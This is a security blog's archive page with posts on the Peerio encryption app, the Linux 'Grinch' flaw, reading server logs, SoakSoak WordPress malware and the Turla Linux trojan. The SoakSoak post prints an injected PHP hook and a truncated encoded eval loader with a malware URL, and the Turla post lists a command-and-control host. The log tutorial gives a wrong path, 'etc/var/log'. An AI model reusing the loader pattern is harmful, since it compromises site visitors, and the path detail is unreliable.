Peerio Promises Encryption for Masses

 Open Source, Security  Comments Off on Peerio Promises Encryption for Masses
Mar 022015
 

Average computer users are in a terrified state today.

Trapped between the Scylla of anonymous hackers from around the world and the Charybdis of government spy agencies, countless computer users have abandoned all hope in the privacy and security of their computer messages and files.

The precarious situation would seem ripe for an explosion in the use of encryption, right?

And yet encryption has failed to take off in a noticeable way.

Only a tiny fraction of computer users (probably 0.000001%) leverage strong encryption for their messages and file storage.

The only reason encryption has not become ubiquitous in an increasingly dangerous world is that it’s impossibly hard to use by average Joes.

The mere mention of private keys and public keys has average computer users scurrying for cover.

That’s why the venerable PGP encryption has never taken off beyond a small group.

Enter a Montreal startup called Peerio Technologies with an ambitious open source project to make encryption technology “as easy as e-mail” for cloud storage and messaging.

Peerio builds off the miniLock encryption technology developed by the startup’s lead software engineer and security expert Nadim Kobeissi.

Peerio Technology

Combining cloud storage with messaging, Peerio promises end-to-end encryption that will ensure messages and files are encrypted before leaving your computer and read only by you and intended recipients.

Peerio simplifies key management by leveraging passphrases instead of passwords. The service lets users pick a username that can be made public, and then Peerio suggests a secure passphrase that generates private keys locally. Apparently, the keys are never sent to the Peerio server and when the app is closed so is the key.

Having Peerio provide the passphrase seems like a terrible idea to me from a privacy and security perspective.

But the company defends its decision stating that users sometimes forgot their passphrases and, further, it could not be certain they were picking secure passphrases.

Peerio developers attempt to allay concerns by saying they’re working on a ‘complex feature’ that will allow users to revoke previous passphrases and set up new ones. This ‘complex feature’ is supposedly in the works and will be ready soon.

As a second line of defense, Peerio offers two-factor authentication. So even if a passphrase is compromised, an attacker would still need the user’s mobile device to gain access to the account.

Other Peerio features include remote file destruction, real-time delivery notification and swift and secure transfer of large files.

As an open-source project, Peerio is publishing its code publicly and asking programmers and security experts to review and test its security.

Currently in “beta”, Peerio is now available for Windows and Mac computers and Google’s Chrome browser.

Visit GitHub to review Peerio’s code.

Mobile Support

Peerio intends to extend support for mobile devices in the near future.

Once the Peerio technology is available for iPhone, Android, Windows phones and Blackberry, users should be able to sync their data across all devices.

The Android and iOS beta should be ready at the latest by early April.

Version 1.0.4.1 of Peerio debuted March 2, 2015 with improvements to the user interface, changes to signup and bug fixes

Peerio plans to make money by offering paid plans for both individuals and groups once its encryption technology is stable.

If you’re keen on test driving Peerio’s beta, you can download the software from its web site.

Deadly Linux Vulnerability Uncovered

 Linux, Security  Comments Off on Deadly Linux Vulnerability Uncovered
Dec 162014
 

A security alert by cloud and security services provider Alert Logic warns of a dangerous vulnerability in the Linux authorization system that allows privilege escalation through “wheel” to unauthorised users.

Wheel is a special user group controlling access to su command, and thereby superuser privileges.

The vulnerability permits unauthorized users to get root access, which in essence means gaining control of the entire system to do whatever malicious actions they want to.

Named “Grinch” (after Dr.Seuss’ unsavory fictional character), the vulnerability is considered serious because of Linux’ sway in e-commerce deployments.

Surveys have found that Linux/Unix power 65% of web servers.

The vulnerability is said to span all Linux distros including mobile platforms like Android that are based on Linux.

Although no patch is available yet, recommendations to avoid the exploit being triggered include studying logs to monitor user actions on the system and avoiding installation tools like PKCon (PackageKit Console Client). Safer to stick with installation tools like Yum or dnf.

According to Alert Logic’s Chief Security Evangelist Stephen Coty, the fix for the vulnerability lies in managing PolKit authorization rules or properly managing group privileges for users.

Red Hat, the maintainer of PolKit, is said to have opened a ‘trouble ticket’ to examine the vulnerability.

Related Content
Stephen Coty Blog Post

Who’s Attacking Your Web Site – Study Log Files

 Security  Comments Off on Who’s Attacking Your Web Site – Study Log Files
Dec 152014
 

The world has gone to dogs in the online arena.

The attacks are increasing and they’re coming fast and furious from Turkey, India, Iran, Romania, Thailand, France, China, Ukraine, Russia, US, Canada and all over the globe.

Both private hackers and government agencies are on the rampage.

You cannot stop all of the attacks but with some effort you can prevent a lot of them before they inflict catastrophic damage on your web site or network.

Log File Analysis

Studying log files on your Linux server is a good way to spot suspicious activity early and stop attacks before they start or get out of hand.

In this post, we will examine different log files that can help to identify malicious or potentially bad actors based mostly on IP addresses.

As always in tackling web security, there’ll be some false positives but that’s the price you pay for security.

Not every visitor from Ukraine, Iran, France, UK or Turkey nor every Amazon Web services IP address is a bad element.

Types of Log Files

Linux systems log everything that happens on the server and store the activity in various files under etc/var/log and etc/var/log/httpd folders.

From a security perspective, the following logs (on a CentOS server) are of interest to us.

1) vsftpd.log – stores all FTP login attempts (including failed attempts) to your server
2) maillog – includes all e-mail sent and received by various users on your server, connections to mail server and postfix/smtpd login failures
3) messages – saves all attempts like relaying, DDOS attacks (mod_evasive attacks,) SMTP attacks, fail2ban actions, invalid smtp saslauthd logins
4) access_log – saved in /log/httpd folder and tells the story of who accessed your server including various bots and their IP addresses
5) error_log – located in /log/httpd folder provides useful information about errors generated on your web server

Now how do we access these various log files.

You can access the log files either through command line or via GUI panels like Webmin.

Command Line

From the command line you can find out malicious visitors or potential attackers by running netstat or ss commands.

While these are extremely useful, they have some limitations as they will not tell you clearly who did what a few hours back, yesterday or two days back on your web site.

Also, you may have to run netstat command multiple times with different options to figure out the attacking IP.

It is here that analyzing log files directly comes in handy.

Log files can be analyzed in two ways:

1) With the command less
2) Using tailf

The less command lets you examine log files for four or five days.

Whereas tailf allows you to monitor log files live as they are being generated.

less

To access log files on your Linux system, you have to first log in as root or superuser.

Once you are in the log folder, you can read the log files through less command.

[root@christyserver]# cd /etc/var/log
[root@christyserver log]# less vsftpd.log

When the log file opens in command line it starts at the beginning of the file. The document may contain logs for three or four days.

The beginning of the log file contains logs for older dates. This is because when the logs are saved, the newest entries are appended at the end of existing log file entries.

You can use various options to navigate the log file opened through less.
a) Page Up or b – Scroll back one page
b) Page Down or press space bar – scroll forward one page
c) Up arrow – scroll up one line
d) Down arrow – scroll down one line
e) G – Move to the end of the text file
f) 1G or g – move to the beginning of the text file
g) /characters – search forward to the next occurrence of characters
h) n -search for the next occurrence of previous search
i) h – display help screen for less
j) q – quit less

Here’s an example of useful stuff gleaned from the less command:

[root@christyserver httpd]#  less access_log
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /ghgh/ghg/gh.php HTTP/1.1" 301 329 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 342 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 301 335 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 339 "-" "-"

In the above example, a bad element from Hong Kong is trying to play mischief with my PHP setup. So our next step ought to be to drop this IP and prevent it from accessing the server again. Continue reading »

SoakSoak Malware Wreaks Havoc on WordPress Sites

 Security  Comments Off on SoakSoak Malware Wreaks Havoc on WordPress Sites
Dec 152014
 

Sorry folks, it’s not just big corporations like Staples, Sony, Target etc that are being attacked by rogue elements.

Several 100,000 WordPress sites, including presumably many belonging to average Joes, have been infected with a Javascript malware seeded by SoakSoak.ru, according to security services provider Sucuri.

The malware causes malicious software to be downloaded to a visitor’s computer.

WordPress is used by individuals, small businesses (restaurants, publishers, contractors etc) and non-profits to run blogs and web sites.

The attack from SoakSoak.ru is said to have prompted Google to blacklist over 11,000 domains. Being bbacklisted by Google is often a kiss of death to a small business or non-profit.

Soak.Soak Malware

Sucuri’s preliminary analysis shows correlation between the new malware and the Revslider vulnerability incidents from September 2014.

The SoakSoak malware modifies the file wp-includes/template-loader.php and includes the following content:

function FuncQueueObject()
{
wp_enqueue_script(“swfobject”);
}
add_action(“wp_enqueue_scripts”, ‘FuncQueueObject’);

This supposedly causes wp-includes/js/swobject.js to be loaded on every page on the site with the below malware:

eval(decodeURIComponent
(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));

Security experts have found that the malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file: hxxp://soaksoak.ru/xteas/code

Currently, the best fix for the SoakSoak malware is to replace the infected files with clean copies or ideally with a fresh WordPress install.

You can check if your favorite WordPress site has malware by using Securi’s free scanner.

Even Netstat Can’t Find Turla Linux Trojan

 Linux, Security  Comments Off on Even Netstat Can’t Find Turla Linux Trojan
Dec 092014
 

Until this morning, like countless others I too labored under the blissful illusion that Netstat was the panacea for all my Linux security concerns.

Alas, that feeling of comfort has disappeared since the discovery of an extremely stealthy Netstat-defying Turla Linux trojan.

The dangers of the Linux Turla trojan including hidden network communications, arbitrary remote command execution and remote management should send a shiver up the spines of server administrators.

The Turla trojan was previously known to attack Windows based computers only via a hard to detect rootkit.

Turla Strikes Penguin

Security experts describe the Linux Turla trojan as a C/C++ executable statically linked against multiple libraries.

It seems much of the trojan’s code is based on public sources combined with some functionalities from the attackers.

Early analysis of this Linux trojan suggests that the Turla cd00r-based malware maintains stealth without needing elevated privileges while running arbitrary remote commands.

To the great distress of Linux system administrators, the trojan can’t be discovered via the popular command line Netstat tool that displays network connections for TCP (incoming and outgoing).

The folks at Kaspersky Labs say the trojan uses techniques that don’t require root access. This means it can more freely run on more victim hosts.

Apparently, even if a regular user with limited privileges launches it, the Turla Linux trojan can continue to intercept incoming packets and run incoming commands on the system.

Turla Linux – Key Features

Executable Characteristics

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped

Statically Linked Libraries
glibc2.3.2 – the GNU C library
openssl v0.9.6 – an older OpenSSL library
libpcap – tcpdump’s network capture library

Command & Control
Hardcoded C&C, known Turla activity: news-bbc.podzone.org
The domain has the following pDNS IP: 80.248.65.183

Expansion of Knowledge Economy Portends Cyber Attack Tsunami

 Security  Comments Off on Expansion of Knowledge Economy Portends Cyber Attack Tsunami
Nov 202014
 

For all those lamenting the current wave of online attacks, I have bad news for you – The worst is still to come.

From the White House to Target to the U.S. State Department to Home Depot to the USPS and countless other organizations, it seems there’s not a single large outfit that’s not suffered a devastating online attack and theft of credit card information and personal data of  millions.

Ask not which large organization has been hacked, instead ask who’s not.

It’s not just businesses that are vulnerable to online attacks. Countless people fall victim daily to diverse forms of malware attacks on their desktop and laptop computers.

A couple of years back, a Google Search Results Hijack malware destroyed one of my Windows PCs.

Ransomware demands to unlock computers have escalated in recent months.

The world is full of nutcases determined to make life miserable for others.

And there’s nothing we can do about it considering there are far too many cyber-attack vectors (active attacks, passive attacks like search engine results and drive-by attacks when you visit an innocent-looking web site etc).

The fundamental weaknesses of the Internet architecture and the availability of countless IP addresses make it impossible to control the wave of attacks. You can sit in a Kiev or New Delhi basement and mount an anonymous attack on a NYC bank with impunity, a feat unimaginable in the physical world.

Even if you block 20, 200 or 2,000 IP addresses via hardware firewalls or IP Tables, hackers still have access to tens of thousands of other IPs from which to crash your web site, attack the server or plant malware in the network.

Each time you block an IP, CIDR or even an entire nation from accessing your network, the cyber-terrorist has no worries. None at all. Because he still has recourse to thousands of other IPs from which to reload and relaunch his attack on your point-of-sale system, server, web site or network.

But the current wave of attacks is just the harbinger of worse things to come over the next decade, more so with the inroads thatr information technology has made into all walks of life (hospitals, electric grids, transportation hubs, schools, air-traffic control, electronic voting etc).

Mark my words!

You’ll look back nostalgically to the present times as the halcyon days of the Internet.

Knowledge Economy —> Cyber Attacks

Until fairly recently, the knowledge economy was the exclusive preserve of U.S., Canada, UK, Germany, France, Japan, South Korea, Russia, Australia, New Zealand and a handful of other countries.

A knowledge economy is not merely one that has a high degree of literacy but one where a wide swathe of people leverage computers and information technology as powerful tools to forge ahead in education, entertainment, business, espionage and war.

By putting knowledge on steroids, information technology has created the knowledge economy.

Thanks to U.S. government funding of research labs (1945-75) and the entrepreneurial itch of Silicon Valley pioneers (1968-2014), the knowledge economy first flowered in the U.S., then moved east to Europe and now reached the shores of a few Third World nations.

For a variety of reasons (falling prices of computers, low-cost school/university education, economic growth etc), the knowledge economy is now starting to establish roots in ambitious nations like China, India, Brazil and Turkey, all with large populations.

Expansion of the knowledge economy to new nations has been accompanied by a massive surge in adoption of open source software like Linux in these nations. I suspect Kali Linux and Ubuntu have more users in China, Russia, India, Ukraine and Turkey than in the rest of the world combined.

As the knowledge economy reaches new geographical frontiers, expect the law of unintended consequences to come into play.

I predict there will be a tremendous surge in cyber attacks on all organizations (small, medium and large) for seven reasons:

* Expansion of the knowledge economy to new nations (like China, India, Iran, Brazil, Turkey etc) providing citizens access to basic infrastructure

* Growth of the open source software movement and easy availability of scores of free tools for port scanning, vulnerability scanning and exploiting servers and networks

* Increasing gap between people entering the knowledge economy and the economic opportunities for them Continue reading »

 Older Entries  Newer Entries